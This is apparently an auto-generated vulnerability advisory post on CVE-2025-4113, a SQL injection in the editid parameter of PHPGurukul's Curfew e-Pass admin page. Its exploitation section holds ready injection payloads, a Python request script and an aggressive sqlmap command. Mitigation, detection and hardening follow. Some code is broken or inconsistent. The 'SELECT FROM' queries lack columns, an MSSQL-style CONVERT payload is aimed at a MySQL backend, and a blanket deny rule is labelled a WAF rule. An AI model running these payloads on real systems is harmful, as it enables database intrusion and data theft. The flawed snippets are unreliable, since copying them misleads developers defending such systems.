PHPGurukul Curfew e-Pass Management System 10, SQL Injection, CVE-2025-4113 (Critical)

Listen to this Post

How CVE-2025-4113 Works

The vulnerability exists in `/admin/edit-pass-detail.php` due to improper sanitization of the `editid` parameter. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. Since the system fails to validate user input, unauthorized database access, data theft, or system compromise is possible. The flaw is remotely exploitable with low attack complexity, requiring only low privileges. The CVSS 4.0 vector (AV:N/AC:L/PR:L/UI:N) confirms network-based exploitation with high impact on confidentiality, integrity, and availability.

DailyCVE Form

Platform: PHPGurukul
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation:

/edit-pass-detail.php?editid=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--
import requests
TARGET = "http://target.com/admin/edit-pass-detail.php"
PAYLOAD = "1' UNION SELECT 1,2,3,4,5,6,7,8,9,database()--"
response = requests.get(TARGET, params={"editid": PAYLOAD})
print(response.text)

Mitigation:

1. Patch: Apply vendor updates.

2. Input Sanitization:

$editid = mysqli_real_escape_string($conn, $_GET['editid']);

3. WAF Rules:

location /admin {
deny all;
}

Detection:

sqlmap -u "http://target.com/admin/edit-pass-detail.php?editid=1" --risk=3 --level=5

Analytics:

  • Attack Vector: Remote (HTTP)
  • Privilege Escalation: Possible via DB compromise.
  • Exploit Availability: Public (PoC disclosed).
  • Affected Components: MySQL backend.

Log Analysis:

SELECT FROM apache_logs WHERE request LIKE "%edit-pass-detail.php?editid=%25%27%";

Hardening:

// Use prepared statements
$stmt = $conn->prepare("SELECT FROM passes WHERE id = ?");
$stmt->bind_param("i", $editid);

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top